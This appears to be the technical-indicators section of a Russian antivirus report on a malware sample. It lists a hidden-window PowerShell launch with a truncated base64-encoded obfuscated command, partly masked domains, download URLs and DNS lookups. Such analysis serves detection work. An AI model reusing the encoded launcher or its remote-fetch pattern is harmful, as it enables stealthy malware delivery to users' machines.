Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IABbAFMAdAByAEkAbgBHAF0AOgA6AGoAbwBJAG4AKAAnACcALAAgACgAKAAzADYALAAgADEAMQA5ACwAIAAxADEANQAsADkAOQAgACwAMQAxADQAIAAsACAAMQAwADUAIAAsACAAMQAxADIAIAAsADEAMQA2ACAALAAzADIALAA2ADEAIAAsACAAMwAyAC...
- 'q-####uctions.com':80
- 'op##a.co.za':80
- 'go###ansbbq.com':80
- 're###teeter.com':80
- http://q-####uctions.com/jkXHSKSGj/
- http://op##a.co.za/hlZWpwYFR/
- http://go###ansbbq.com/qliiKURi/
- DNS ASK q-####uctions.com
- DNS ASK to###eeker.com
- DNS ASK op##a.co.za
- DNS ASK go###ansbbq.com
- DNS ASK re###teeter.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IABbAFMAdAByAEkAbgBHAF0AOgA6AGoAbwBJAG4AKAAnACcALAAgACgAKAAzADYALAAgADEAMQA5ACwAIAAxADEANQAsADkAOQAgACwAMQAxADQAIAAsACAAMQAwADUAIAAsACAAMQAxADIAIAAsADEAMQA2ACAALAAzADIALAA2ADEAIAAsACAAMwAyAC...' (со скрытым окном)